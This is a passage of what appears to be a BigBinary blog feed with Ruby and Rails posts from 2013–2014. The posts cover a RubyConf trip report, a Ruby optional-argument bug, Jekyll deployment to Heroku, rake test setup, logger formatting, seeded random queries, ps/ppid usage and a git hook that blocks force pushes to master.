      <content type="html"><![CDATA[<p><img src="/blog_images/2014/reddotrubyconf/reddotrubyconf2014_logo.png" alt="RedDotRubyConf2014logo"></p><p>I and <a href="http://twitter.com/vipulnsward">Vipul</a> recently gave a talk at<a href="http://reddotrubyconf.com">RedDotRubyConf</a> on <strong><em>ActiveRecord can't do it? Arelcan!</em></strong>. It was our first trip to Singapore and we enjoyed the conference aswell as Singapore a lot.</p><p>RDRC2014 was awesome.</p><h2>Day 1</h2><p>We reached the venue in time for <a href="https://twitter.com/_ko1">Koichi's</a> keynote on<strong><em><a href="http://www.atdot.net/~ko1/activities/2014_reddotrubyconf_pub.pdf">Ruby.Inspect</a></em></strong>.He talked about various things related to development of Ruby including Rubyteam at Heroku, recent releases of Ruby and new syntax introduced in Ruby 2.1.He also talked about performance improvements including Generational GC -<strong><em>RGenGC</em></strong> and upcoming features in Ruby 2.2.</p><p>After that in second part of the talk, he talked about inspection toolsavailable in Ruby. It was a deep technical part for me and something to learnabout. The message he gave from the talk was to become <strong><em>low level engineer</em></strong>.</p><p>Second talk of the conf was from <a href="https://twitter.com/tjschuck">T.J. Schuck</a>about solving one of the hardest problems.<strong><em><a href="https://speakerdeck.com/tjschuck/80-000-plaintext-passwords-an-open-source-love-story-in-three-acts">Storing and retrieving passwords in a secure way</a></em></strong>.He talked about how increasing improvements in hardware pose a challenge as evenif you use proper algorithm it can be cracked with high computing machines. Itwas interesting to know about internals of storing passwords. I had never caredtoo much about it :)</p><p>After the coffee break, <a href="https://twitter.com/bkeepers">Brandon Keepers</a> fromGithub gave talk on<strong><em><a href="https://speakerdeck.com/bkeepers/tending-your-open-source-garden">Tending Your Open Source Garden</a></em></strong>.Github is still on Rails 2.3 and Brandon is working on bringing it up to newversion. His talk was a great advice for those who want to contribute to opensource and community. I think this talk resonated well with the audience as mostof the crowd was new and interested in open source contributions.</p><p><a href="https://twitter.com/gautamrege">Gautam Rege</a> from Josh Software gave talk on<strong><em><a href="http://www.slideshare.net/gautamrege/reddot-ruby-conf-2014-dark-side-of-ruby">Dark Side of Ruby</a></em></strong>.We had attended this talk at GCRC so we left the hall after some time and didour one last practice. But i heard the feedback was very well for this talk.</p><p>After the lunch, <a href="https://twitter.com/keithpitt">Keith Pitt</a> talked about<strong><em>Guide to Continuous Deployment with Rails</em></strong>. He talked about keepingeverything related to deployment from CI to migrations in sync. One of theinteresting thing that i came to know from this talk was how to enable zerodowntime deployments on Heroku using preboot feature.</p><p><a href="https://twitter.com/bentanweihao">Benjamin Tan</a> gave talk on<strong><em><a href="https://speakerdeck.com/benjamintan/ruby-plus-elixir-polyglottin-ftw">Ruby + Elixir: Polyglotting FTW!</a></em></strong>after that. He talked about Elixir. This talk was about looking beyond Ruby andadding another tool to our skills. Benjamin also gave some demos including thelast one in which he used sidekiq with Elixir. The actual work was done byElixir workers. I will definitely give a shot to Elixir in the coming days.</p><p>After that we gave our talk on <strong><em><a href="http://github.com/rails/arel">Arel</a></em></strong>. I wasa bit nervous as it was my first talk. But it went well. We finished a bit earlythan expected. But there was tea break after our talk :). We got some goodfeedback from the attendees and especially beginners who had not used Arelbefore. Our slides are<a href="https://docs.google.com/presentation/d/1O4jYDnq8d0lSu3D2c_khKPkQ2GKCm1Fw0y1nQacmwVc/pub#slide=id.p">here</a></p><p>After the tea break, lightning talks started. First talk was by<a href="https://twitter.com/hsbt">Hiroshi Shibata</a> about how anyone can<strong><em><a href="https://speakerdeck.com/hsbt/how-to-improve-experiences-of-ruby">contribute to Ruby</a></em></strong>to make it better. He talked about how to submit issues, feature requests usingRedmine. After that <a href="https://twitter.com/pluswn">William Notowidagdo</a> gave talkon <strong><em>Building REST API using Grape</em></strong>. With Rails and Rails API gem it hasbecome easy to generate an API. But we have grape also as a lightweight tool.<a href="https://twitter.com/sayanee_">Sayani Basu</a> talked about how to make a<strong><em><a href="https://speakerdeck.com/sayanee/podcasting-with-jekyll">podcast with Jekyll and other tools</a></em></strong>in 5 minutes.</p><p>We are planning to start a podcast here in India about Ruby community so it wasgood to know about it.</p><p>After these awesome lightning talks, the last session of Day 1 started. Therewere talks on Fluentd and Domain driven design. Both were good to know assomething outside of daily routine.<a href="https://twitter.com/konstantinhaase">Konstantin Haase's</a><a href="https://speakerdeck.com/rkh/reddotrubyconf-2014-magenta-is-a-lie-and-other-tales-of-abstraction">last talk</a>of the day was *<strong>*Meta**</strong> talk. He talked on abstraction and how ithappens in our mind. Our mind affects what we see, like we see magenta color.Similarly abstraction happens in mind. I had to concentrate a lot in this talkto understand it. But it was worth it.</p><p>And that ended the first day of the conf. It was exciting and we were lookingforward to second day.</p><h2>Day 2</h2><p>Day 2 started with <a href="https://twitter.com/brinary">Brian Helmkamp's</a> talk on<strong><em>Docker</em></strong>. We missed the initial part of the talk. He talked about basics ofDocker, how to deploying in container environment. He also discussed aboutdeploying a Rails app using docker and how it makes very easy to deploydifferent parts of the system using docker very easily.</p><p><a href="https://twitter.com/_zzak">Zachary Scott</a> gave next talk introducing<strong><em><a href="https://speakerdeck.com/zzak/reddotrubyconf-2014-ruby-core-for-tenderfeet">Ruby Core team</a></em></strong>and how it works, how it collaborates, developer meetings, how anyone cancontribute to MRI. We also had a Friday hug in this talk :) This talk combinedwith Hiroshi's lightning talk on the first day was great insight into CRubydevelopment.</p><p>After the break, <a href="https://twitter.com/_solnic_">Pioter Solnica</a> gave anexcellent talk on<strong><em><a href="https://speakerdeck.com/solnic/convenience-vs-simplicity">Convenience vs Simplicity</a></em></strong>.He talked about convenience offered by ActiveRecord may not be simple tounderstand. The things such as input conversion, validation are convenient touse as a developer but not necessarily simple to understand. He also discussedpresenters, immutable data structures,<a href="http://github.com/dkubb/adamantium">Adamantium</a> for creating immutable objectsin Ruby. In the second part of the talk, he talked about relations and how theycan be used in composing queries. He explained this idea using<a href="https://github.com/rom-rb">Ruby Object Mapper</a>. It uses<a href="https://github.com/rom-rb/axiom">Axiom</a> as underlying relational algebrainstead of Arel. Its an interesting project to checkout.</p><p>After that our very own <a href="https://twitter.com/anildigital">Anil Wadghule</a> talkedon<strong><em><a href="https://speakerdeck.com/anildigital/solid-design-principles-in-ruby">Solid Design Principles in Ruby</a></em></strong>.His emphasis was on following designs than patterns. He also showed codeexamples and refactored them after applying principles. His talk was goodinsight into understanding what are these Solid principles and how they can beapplied in real life.</p><p>We skipped the session after lunch and roamed around talking with people. We hadan interesting discussion about hiring Ruby on Rails developers, interviewprocesses etc.</p><p>Then lightning talks started. <a href="https://twitter.com/code_ssl">Sheng-Loong-Su</a>talked first on using<strong><em><a href="https://speakerdeck.com/sushengloong/algorithmic-trading-for-fun-and-profit-red-dot-ruby-conf-2014">Algorithms for Trading</a></em></strong>.He talked about collecting data using feeder, preparing trading signals usingstrategy and making decision based on trading signals. One of the best talks ofday 2 was by <a href="https://twitter.com/arnvald">Grzegorz Witek</a> on how he istraveling the world without getting burned out and still happily programming. Hetalked about his experiences in different countries being a<strong><em><a href="https://speakerdeck.com/arnvald/nomadic-programmer">Nomadic Programmer</a></em></strong>.It was one of the best inspirational talks according to me. The last lightningtalk was about <strong><em>Using Vagrant for setting up Dev environment</em></strong> by<a href="https://twitter.com/fsw0723">Shuwei</a> and <a href="">Arathi</a>.</p><p><a href="https://twitter.com/fullstackcoder">Nicholas Simmons</a> talked on experience ofbuilding a<strong><em><a href="https://speakerdeck.com/fullstackcoder/reddotrubyconf2014">Single page web app and back again</a></em></strong>to normal app. He gave real life metrics from Shopify and showed problems facedwith single page apps, batman.js and how moving back to a normal app helpedthem.</p><p>Then chocolate man from Belgium,<a href="https://twitter.com/_toch">Christophe Philemotte</a>, gave talk on<strong><em><a href="https://speakerdeck.com/toch/rdrc-2014-safety-nets-learn-to-code-with-confidence">Safety Nets: Learn to code with confidence</a></em></strong>.His talk was about how we can prevent code in long term using testing, staticanalysis using tools such as flog, flay, rubocop for removing duplication,reducing complexity, fixing warnings. He also talked about importance of codereview. His code is present<a href="https://github.com/8thcolor/rdrc2014-safetynets">here</a>. He also gave usexcellent chocolates from Belgium.</p><p>And the last keynote by <a href="https://twitter.com/tenderlove">Aaron Patterson</a>. Asalways, it was full of everything - tech stuff, jokes, puns.</p><p>He talked on how he is making performance improvements in Active Record, linkgenerations. He showed some graphs with performance of various database adapterstested on Rails versions ranging from 2.3 to 4 to master. He urged everyone toreport performance issues to the core team so that they are addressed quickly.This is the <a href="https://github.com/tenderlove/ko1-test-app">app</a> used for doingperformance testing by him.</p><p>And that ended talks at RDRC. We had an awesome after party where we discussedwith lots of people about Ruby, Rails as well as other stuff. We would like tothank <a href="https://twitter.com/winstonyw">Winston</a> for inviting us toRedDotRubyConf.</p><p>I am already looking at RDRC 2015.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Six Year Old Optional / Keyword Arguments bug]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/six-years-old-optional-keyword-arguments-bug"/>
      <updated>2014-04-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/six-years-old-optional-keyword-arguments-bug</id>
      <content type="html"><![CDATA[<p>I recently conducted a workshop about <strong><em>Contributing to Open-Source</em></strong> at first-ever <a href="http://rubyconf.ph/">Rubyconf Philippines</a>. In its introductory talk,I spoke about how Aaron Patterson, fixed <a href="https://github.com/rails/rails/commit/e88da370f190cabd1e9750c5b3531735950ab415">a 6 year old bug</a>about Optional Arguments, that existed in Rails.</p><h2>Bug in ruby</h2><p>Let's try a small program.</p><pre><code class="language-ruby">class Labdef dayputs 'invoked''sunday'enddef runday = dayendendputs Lab.new.run</code></pre><p>What do you think would be printed on your terminal when you run the above program.</p><p>If you are using ruby 2.1 or below then you will see nothing. Why is that ? That's because of a bug in ruby.</p><p>This is <a href="https://bugs.ruby-lang.org/issues/9593">bug number 9593</a> in ruby issue tracker.</p><p>In the statement <code>day = day</code> the left hand side variable assignment is stopping the call to method <code>day</code>. So the method <code>day</code> is never invoked.</p><h2>Another variation of the same bug</h2><pre><code class="language-ruby">class Labdef dayputs 'invoked''sunday'enddef run( day: day)endendputs Lab.new.run</code></pre><p>In the above case we are using the keyword argument feature added in Ruby 2.0 . If you are unfamiliar with keyword arguments feature of ruby then checkout this <a href="https://www.youtube.com/watch?v=u8Q6Of_mScI">excellent video</a> by <a href="https://twitter.com/peterc">Peter Cooper</a>.</p><p>In this case again the same behavior is exhibited. The method <code>day</code> is never invoked.</p><h2>How this bug affects Rails community</h2><p>You might be thinking that I would never write code like that. Why would you have a variable name same as method name.</p><p>Well Rails had this bug because rails has code like this.</p><pre><code class="language-ruby">def has_cached_counter?(reflection = reflection)end</code></pre><p>In this case method <code>reflection</code> never got called and the variable <code>reflection</code> was always assigned nil.</p><h2>Fixing the bug</h2><p><a href="https://bugs.ruby-lang.org/users/4">Nobu</a> <a href="https://bugs.ruby-lang.org/projects/ruby-trunk/repository/revisions/45272">fixed</a> this bug in ruby 2.2.0. By the way Nobu is also known as &quot;ruby patch-monster&quot; because of amount of patches he applies to ruby.</p><p>So this bug is fixed in ruby 2.2.0. What about the people who are not using ruby 2.2.0.</p><p>The simple solution is not to omit the parameter. If we change the above code to</p><pre><code class="language-ruby">def has_cached_counter?(reflection = reflection())end</code></pre><p>then we are explicitly invoking the method <code>reflection</code> and the variable <code>reflection</code> will be assigned the output of method <code>reflection</code>.</p><p>And this is how <a href="https://github.com/rails/rails/commit/e88da370f190cabd1e9750c5b3531735950ab415">Aaron Patterson fixed</a> six years old bug.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to deploy jekyll site to heroku]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/deploy-jekyll-to-heroku"/>
      <updated>2014-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploy-jekyll-to-heroku</id>
      <content type="html"><![CDATA[<p><a href="http://jekyllrb.com">jekyll</a> is an excellent tool for creating static pages andblogs. Our <a href="https://bigbinary.com/blog">BigBinary blog</a> is based on jekyll.Deploying our blog to heroku took longer than I had expected. I am outliningwhat I did to deploy <a href="https://bigbinary.com/blog">BigBinary blog</a> to heroku.</p><h2>Add exclude vendor to _config.yml</h2><p>Open <code>_config.yml</code> and add following line at the very bottom.</p><pre><code class="language-ruby">exclude: ['vendor']</code></pre><h2>Add Procfile</h2><p>Create a new file called <code>Procfile</code> at the root of the project with followingcontent.</p><pre><code class="language-ruby">web: bundle exec jekyll build &amp;&amp; bundle exec thin start -p\$PORT -Vconsole: echo consolerake: echo rake</code></pre><h2>Add Gemfile</h2><p>Add <code>Gemfile</code> at the root of the project.</p><pre><code class="language-ruby">source 'https://rubygems.org'gem 'jekyll', '2.4.0'gem 'rake'gem 'foreman'gem 'thin'gem 'rack-contrib'</code></pre><h2>Add config.ru</h2><p>Add <code>config.ru</code> at the root of the project with following content.</p><pre><code class="language-ruby">require 'rack/contrib/try_static'use Rack::TryStatic,:root =&gt; &quot;\_site&quot;,:urls =&gt; %w[/],:try =&gt; ['.html', 'index.html', '/index.html']run lambda { |env|return [404, {'Content-Type' =&gt; 'text/html'}, ['Not Found']]}</code></pre><h2>Test on local machine first</h2><p>Test locally by executing <code>bundle exec jekyll serve</code>.</p><h2>Push code to heroku</h2><p>Now run <em>bundle install</em> and add the <em>Gemfile.lock</em> to the repository and pushthe repository to heroku.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to add additional directories to test]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/adding-directory-to-rake-test"/>
      <updated>2014-04-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-directory-to-rake-test</id>
      <content type="html"><![CDATA[<p>In a project we needed to write different parsers for different services. Ratherthan putting all those parsers in <em>app/models</em> or in <em>lib</em> we created a newdirectory. We put all the parsers in <em>app/parsers</em> .</p><p>We put all the tests for these parsers in <em>test/parsers</em> directory.</p><p>We can run tests parsers individually by executing <em>rake testtest/parsers/email_parser_test.rb</em>. However when we run <em>rake</em> then tests in<em>test/parsers</em> are not picked up.</p><p>We added following code to <em>Rakefile</em> to make <em>rake</em> pickup tests in<em>test/parsers</em>.</p><pre><code class="language-ruby"># Adding test/parsers directory to rake test.namespace :test do  desc &quot;Test tests/parsers/* code&quot;  Rails::TestTask.new(parsers: 'test:prepare') do |t|    t.pattern = 'test/parsers/**/*_test.rb'  endendRake::Task['test:run'].enhance [&quot;test:parsers&quot;]</code></pre><p>Now when we run <em>rake</em> or <em>rake test</em> then tests under <em>test/parsers</em> are alsopicked up.</p><p>Above code adds a rake task <em>rake test:parsers</em> which would run all tests under<em>test/parsers</em> directory.</p><p>We can see this task by execute <em>rake -T test</em>.</p><pre><code class="language-plaintext">$ rake -T testrake test         # Runs test:units, test:functionals, test:integration togetherrake test:all     # Run tests quickly by merging all types and not resetting dbrake test:all:db  # Run tests quickly, but also reset dbrake test:parsers # Test tests/parsers/* coderake test:recent  # Run tests for {:recent=&gt;[&quot;test:deprecated&quot;, &quot;test:prepare&quot;]} / Deprecated; Test recent changes</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring Log Formatting in Rails]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/logger-formatting-in-rails"/>
      <updated>2014-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/logger-formatting-in-rails</id>
      <content type="html"><![CDATA[<p>Ideally we should be logging an exception in Rails like this.</p><pre><code class="language-ruby">begin  raise &quot;Amount must be more than zero&quot;rescue =&gt; exception  Rails.logger.info exceptionend</code></pre><p>Above code would produce one line log message as shown below.</p><pre><code class="language-plaintext">Amount must be more than zero</code></pre><p>In order to get backtrace and other information about the exception weneed to handle logging like this.</p><pre><code class="language-ruby">begin  raise &quot;Amount must be more than zero&quot;rescue =&gt; exception  Rails.logger.info exception.class.to_s  Rails.logger.info exception.to_s  Rails.logger.info exception.backtrace.join(&quot;\n&quot;)end</code></pre><p>Above code would produce following log message.</p><pre><code class="language-plaintext">RuntimeErrorAmount must be more than zero/Users/nsingh/code/bigbinary_llc/wheel/app/controllers/home_controller.rb:5:in `index'/Users/nsingh/.rbenv/versions/2.0.0-p247/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/implicit_render.rb:4:in `send_action'/Users/nsingh/.rbenv/versions/2.0.0-p247</code></pre><p>Now let's look at why Rails logger does not produce detailed logging and what can be done about it.</p><h2>A closer look at Formatters</h2><p>When we use <code>Rails.logger.info(exception)</code> then the output is formattedby <code>ActiveSupport::Logger::SimpleFormatter</code>. It is a custom formatter defined by Rails that looks like this.</p><pre><code class="language-ruby"># Simple formatter which only displays the message.class SimpleFormatter &lt; ::Logger::Formatter  # This method is invoked when a log event occurs  def call(severity, timestamp, progname, msg)    &quot;#{String === msg ? msg : msg.inspect}\n&quot;  endend</code></pre><p>As we can see it inherits from <code>Logger::Formatter</code> defined by <a href="http://www.ruby-doc.org/stdlib-2.1.0/libdoc/logger/rdoc/Logger.html">Ruby Logger</a> .It then overrides <code>call</code> method which is originally defined as</p><pre><code class="language-ruby">#Format = &quot;%s, [%s#%d] %5s -- %s: %s\n&quot;def call(severity, time, progname, msg)  Format % [severity[0..0], format_datetime(time), $$, severity, progname,    msg2str(msg)]end............def msg2str(msg)  case msg  when ::String    msg  when ::Exception    &quot;#{ msg.message } (#{ msg.class })\n&quot; &lt;&lt;      (msg.backtrace || []).join(&quot;\n&quot;)  else    msg.inspect  endend</code></pre><p>When exception object is passed to <code>SimpleFormatter</code> then <code>msg.inspect</code> is called and that's why we see the exception message without any backtrace.</p><p>The problem is that Rails's SimpleFormatter's call method is a bit dumbcompared to Ruby logger's call method.</p><p>Ruby logger's method has a special check for exception messages. If the message it is going to print is of class <code>Exception</code> then it prints backtrace also.In comparison <code>SimpleFormatter</code> just prints <code>msg.inspect</code> for objects of <code>Exception</code> class.</p><h2>Configuring logger</h2><p>This problem can be solved by using <code>config.logger</code>.</p><p>From <a href="http://guides.rubyonrails.org/configuring.html">Rails Configuring Guides</a> we have</p><blockquote><p><code>config.logger</code> accepts a logger conforming to the interface of Log4r or the default Ruby Logger class.Defaults to an instance of <code>ActiveSupport::Logger</code>, with auto flushing off in production mode.</p></blockquote><p>So now we can configure Rails logger to not to be <code>SimpleFomatter</code> and go back to ruby's logger.</p><p>Let's set <code>config.logger = ::Logger.new(STDOUT)</code> in <code>config/application.rb</code> and then try following code.</p><pre><code class="language-ruby">begin  raise &quot;Amount must be more than zero&quot;rescue =&gt; exception  Rails.logger.info exceptionend</code></pre><p>Now above code produces following log message.</p><pre><code class="language-plaintext">I, [2013-12-17T01:05:41.944859 #13537]  INFO -- : Amount must be more than zero (RuntimeError)test_app/app/controllers/page_controller.rb:3:in `index'/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/implicit_render.rb:4:in `send_action'/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/abstract_controller/base.rb:189:in `process_action'/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/rendering.rb:10:in `process_action'...&lt;snip&gt;...</code></pre><h2>Sending log to STDOUT is also a good practice</h2><p>As per <a href="http://12factor.net/logs">http://12factor.net/logs</a>, anapplication should not concern itself much with the kind of loggingframework being used. The application should write log to STDOUT andlogging frameworks should operate on log streams.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Displaying non repeating random records]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/non-repeating-random-records"/>
      <updated>2013-11-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/non-repeating-random-records</id>
      <content type="html"><![CDATA[<p>For one of our clients we need to display random records from the database.That's easy enough. We can use <code>random()</code> function.</p><pre><code class="language-ruby">Batch.published_and_featured.order('random()')                            .paginate(per_page: 20, page: params[:page])</code></pre><p>Here we are using PostgreSQL database but ,I believe, above query will also workon MySQL.</p><p>The problem here is that if the user clicks on next page then we will try to getnext set of 20 random records. And since these records are truly random,sometimes the user might see the records which has already been seen in thefirst page.</p><p>The fix is to make it random but not truly random. It needs to be random with aseed.</p><h2>Fix in MySQL</h2><p>In MySQL we can pass seed directly to <code>random()</code> function.</p><pre><code class="language-ruby">Batch.published_and_featured.order('random(0.3)')                            .paginate(per_page: 20, page: params[:page])</code></pre><h2>Fix in PostgreSQL</h2><p>In PostgreSQL it is a little more cumbersome. We first need to set seed and thenthe subsequent query's usage of <code>random()</code> will make use of seed value.</p><pre><code class="language-ruby">Batch.connection.execute &quot;SELECT setseed(0.2)&quot;Batch.published_and_featured.order('random()')                            .paginate(per_page: 20, page: params[:page])</code></pre><h2>Set seed value in before_action</h2><p>For different user we should use different seed value and this value should berandom. So we set the seed value in <code>before_action</code>.</p><pre><code class="language-ruby">def set_seed  cookies[:random_seed] ||= SecureRandom.random_numberend</code></pre><p>Now change the query to use the seed value and we are all set.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Record is still magical]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/active-record-is-still-magical"/>
      <updated>2013-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-record-is-still-magical</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2013/active-record-is-still-magical/wicked_good_ruby_conf_2013_logo.png" alt="WickedGoodRubyConf"></p><p>I gave a talk at <a href="http://wickedgoodruby.com/">Wicked Good Ruby Conference</a>conference. The conference was very well organized and I had a lot of funmeeting new people.</p><p>Confreaks has put out the video. Slides are below too. I'm sorry about the badaudio.</p><p>Boston in November is just awesome. I had a lot of fun driving around andenjoying the<a href="https://www.google.com/search?q=fall+in+boston&amp;espv=2&amp;tbm=isch&amp;tbo=u&amp;source=univ&amp;sa=X&amp;ei=O1XWU8OtLYKUyASHjYLACQ&amp;ved=0CBwQsAQ&amp;biw=1309&amp;bih=665#q=fall+in+boston&amp;tbm=isch">fall color</a>.</p><p>&lt;iframe width=&quot;714&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/RUOvI_iMyDY&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;br&gt;&lt;div style=&quot;left: 0; width: 100%; height: 0; position: relative; padding-bottom: 76.9014%;&quot;&gt;&lt;iframe src=&quot;https://speakerdeck.com/player/3909c200157f013102e61a54756b74c2?slide=8&quot; style=&quot;border: 0; top: 0; left: 0; width: 100%; height: 100%; position: absolute;&quot; allowfullscreen scrolling=&quot;no&quot; allow=&quot;encrypted-media&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Getting arguments passed to command]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/getting-arguments-passed-to-command"/>
      <updated>2013-09-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/getting-arguments-passed-to-command</id>
      <content type="html"><![CDATA[<p>In <a href="do-not-allow-force-push-to-master">previous blog</a> we discussed ruby codewhere we used <code>ps -ocommand</code>. In this blog let's discuss how to get argumentspassed to a command.</p><h2>What is the issue</h2><p>In the referred blog we are trying to find if <code>--force</code> or <code>-f</code> argument waspassed to the <code>git push</code> command.</p><p>The kernel knows the arguments that was passed to the command. So the only wayto find that answer would be to ask kernel what was the full command. The toolto deal with such issues is <code>ps</code>.</p><p>In order to play with <code>ps</code> command let's write a simple ruby program first.</p><pre><code class="language-plaintext"># sl.rbputs Process.pidputs Process.ppidsleep 99999999</code></pre><p>In terminal execute <code>ruby sl.rb</code>. In another terminal execute <code>ps</code>.</p><pre><code class="language-plaintext">$ ps  PID TTY           TIME CMD82246 ttys000    0:00.51 -bash87070 ttys000    0:00.04 ruby loop.rb a, b, c82455 ttys001    0:00.40 -bash</code></pre><p>So here I have two bash shell open in two different tabs in my terminal. Firstterminal tab is running s1.rb. The second terminal tab is running <code>ps</code>. In thesecond terminal we can see the arguments that were passed to program <code>s1</code>.</p><p>By default <code>ps</code> lists all the processes belonging to the user executing thecommand and the processes started from the current terminal.</p><h2>Option -p</h2><p><code>ps -p87070</code> would show result only for the given process id.</p><pre><code class="language-plaintext">$ ps -p 87070  PID TTY           TIME CMD87070 ttys000    0:00.04 ruby loop.rb a, b, c</code></pre><p>We can pass more than on process id.</p><pre><code class="language-plaintext">$ ps -o pid,command -p87070,82246  PID COMMAND82246 -bash87070 ruby loop.rb a, b, c</code></pre><h2>Option -o</h2><p><code>ps -o</code> can be used to select the attributes that we want to be shown. Forexample I want only pids to be shown.</p><pre><code class="language-plaintext">$ ps -o pid  PID822468707082455</code></pre><p>Now I want <code>pid</code> and <code>command</code>.</p><pre><code class="language-plaintext">$ ps -o pid,command  PID COMMAND82246 -bash87070 ruby loop.rb a, b, c82455 -bash</code></pre><p>I want result only for a certain process id.</p><pre><code class="language-plaintext">$ ps -o command -p87070COMMANDruby loop.rb a, b, c</code></pre><p>Now we have the arguments that were passed to the command. This is the code thatarticle was talking about.</p><p>For the sake of completeness let's see a few more options.</p><h2>Option -e</h2><p><code>ps -e</code> would list all processes.</p><pre><code class="language-plaintext">$ ps -e  PID TTY           TIME CMD    1 ??         2:56.20 /sbin/launchd   11 ??         0:01.90 /usr/libexec/UserEventAgent (System)   12 ??         0:02.11 /usr/libexec/kextd   14 ??         0:09.00 /usr/sbin/notifyd   15 ??         0:05.81 /usr/sbin/securityd -i   ........................................   ........................................</code></pre><h2>Option -f</h2><p><code>ps -f</code> would list a lot more attributes including <code>ppid</code>.</p><pre><code class="language-plaintext">$ ps -f  UID   PID  PPID   C STIME   TTY           TIME CMD  501 82246 82245   0  2:06PM ttys000    0:00.51 -bash  501 87070 82246   0  4:54PM ttys000    0:00.04 ruby loop.rb a, b, c  501 82455 82452   0  2:07PM ttys001    0:00.42 -bash</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[What is ppid]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/what-is-ppid"/>
      <updated>2013-09-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/what-is-ppid</id>
      <content type="html"><![CDATA[<p>In <a href="do-not-allow-force-push-to-master">previous blog</a> we discussed ruby codewhere we used two things: <code>ppid</code> and <code>ps -ocommand</code>. In this blog let's discuss<code>ppid</code>. <code>ps -ocommand</code> is discussed in the<a href="getting-arguments-passed-to-command">next blog</a>.</p><h2>Parent process id is ppid</h2><p>We know that every process has a process id. This is usually referred as <code>pid</code>.In *nix world every process has a parent process. And in ruby the way to getthe &quot;process id&quot; of the parent process is through <code>ppid</code>.</p><p>Let's see it in action. Time to fire up irb.</p><pre><code class="language-plaintext">irb(main):002:0&gt; Process.pid=&gt; 83132irb(main):003:0&gt; Process.ppid=&gt; 82455</code></pre><p>Now keep the irb session open and go to anther terminal tab. In this new tabexecute <code>pstree -p 83132</code></p><pre><code class="language-plaintext">$ pstree -p 83132-+= 00001 root /sbin/launchd \-+= 00151 nsingh /sbin/launchd   \-+= 00189 nsingh /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal -psn_0_45067     \-+= 82452 root login -pf nsingh       \-+= 82455 nsingh -bash         \--= 83132 nsingh irb</code></pre><p>If <code>pstree</code> is not available then you can easily install it using<code>brew install pstree</code>.</p><p>As you can see from the output the process id 83132 is at the very bottom of thetree. The parent process id is 82455 which belongs to &quot;bash shell&quot;.</p><p>In irb session when we did <code>Process.ppid</code> then we got the same value 82455.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Do not allow force push to master]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/do-not-allow-force-push-to-master"/>
      <updated>2013-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/do-not-allow-force-push-to-master</id>
      <content type="html"><![CDATA[<p>At BigBinary we create a branch for every issue. We deploy that branch and onlywhen it is approved that branch is merged into master.</p><p>Time to time we rebase the branch. And after rebasing we need to do <code>force</code> pushto send the changes to github. And once in a while someone <code>force</code> pushes intomaster by mistake. We recommend to set <a href="/how-we-work">push.default to current</a>to avoid such issues but still sometimes force push does happen in master.</p><p>In order to prevent such mistakes in future we are using<a href="https://github.com/bigbinary/tiny_scripts/blob/master/git-hooks/hooks/pre-push">pre-push hook</a>.This is a small ruby program which runs before any <code>git push</code> command. If youare force pushing to <code>master</code> then it will reject the push like this.</p><pre><code class="language-plaintext">*************************************************************************Your attempt to FORCE PUSH to MASTER has been rejected.If you still want to FORCE PUSH then you need to ignore the pre_push git hook by executing following command.git push master --force --no-verify*************************************************************************</code></pre><h2>Requirements</h2><p><code>pre-push</code> hook was<a href="https://github.com/git/git/blob/master/Documentation/RelNotes/1.8.2.txt#L167">added to git</a>in version 1.8.2. So you need git 1.8.2 or higher. You can easily upgrade git byexecuting <code>brew upgrade git</code> .</p><pre><code class="language-plaintext">$ git --versiongit version 1.8.2.3</code></pre><h2>Setting up hooks</h2><p>In order for these hooks to kick in they need to be setup.</p><p>First step is to clone the <a href="https://github.com/bigbinary/tiny_scripts">repo</a> toyour local machine. Now open <code>~/.gitconfig</code> and add following line.</p><pre><code class="language-plaintext">[init]  templatedir= /Users/neeraj/code/tiny_scripts/git-hooks</code></pre><p>Change the value <code>/Users/neeraj/code/tiny_scripts/git-hooks</code> to match with thedirectory of your machine.</p><h2>Making existing repositories aware of this hook</h2><p>Now <code>pre-push</code> hook is setup. Any new repository that you clone will have thefeature of not being able to force push to master.</p><p>But existing repositories do not know about this git-hook. To make existingrepositories aware of 